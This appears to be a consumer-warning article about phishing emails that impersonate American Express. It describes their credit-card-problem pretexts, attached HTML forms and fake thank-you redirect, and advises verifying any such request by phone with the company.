American Express is a brand that is trusted around the world. When you see an e-mail from this company in your inbox, you automatically think that there’s nothing wrong with it and it has informative purposes. Well, combine the reputation of American Express with a warning concerning your credit card.
What will happen? You will actually believe that the e-mail is meant to keep you safe and prevent the unwanted theft of sensitive data. Unfortunately, this is not the case. There’s a scam that uses the name of the American Express brand for phishing purposes, so beware of this type of e-mails.
How do these e-mails work? If you are not paying sufficient attention, they can look like genuine American Express e-mails, as they use precisely the same logos and visual elements. Plus, when you read that there are issues with your credit card, all you’ll focus on will be the so-called card credit problems.
You will want to solve them immediately, so you are tempted to follow the instructions presented by the e-mail you just received. In this case, you will be prompted to use an HTML phishing form that is supposed to help you out. But, it will do the opposite, as the information shared through such a form will end up in the wrong hands.
The worst part is that this kind of e-mails is not something new. They started to be sent since the month of October, this year. They were also sent in a number of versions so that people won’t suspect anything. However, all the versions were made to appear like reports or notifications concerning problems with the user’s credit card.
This way, the scammers had a good excuse to demand sensitive information, with the so-called intention of repairing the problem. Besides asking users to complete the form, the e-mails also recommended the creation of another account, at a specified website address. Because the e-mails are sent to people that have accounts at American Express and have subjects that appear rather urgent, like “action required” or “security notification”, they are rather credible to the untrained eye. To make it look even more authentic after the user submits the form, a real American Express page is displayed, thanking the user for his or her feedback.
It is worth remembering that companies will never use attached forms to an e-mail when requiring sensitive data from their customers. This form of transmitting data is not safe, so it will not be employed by service providers that wish to protect their clients. If you do receive an e-mail asking you to submit personal information with the help of a form, it would be recommended not to do so without further checks. It doesn’t matter if the e-mail comes from American Express or any other company.
If you receive such requests via e-mail, the best way to check the validity of the request is by calling the company in question by phone and asking if they actually made such a request. If the answer of the company is negative, you are probably looking at an e-mail with a phishing form attached. So, it is best to delete the e-mail and not follow its instructions.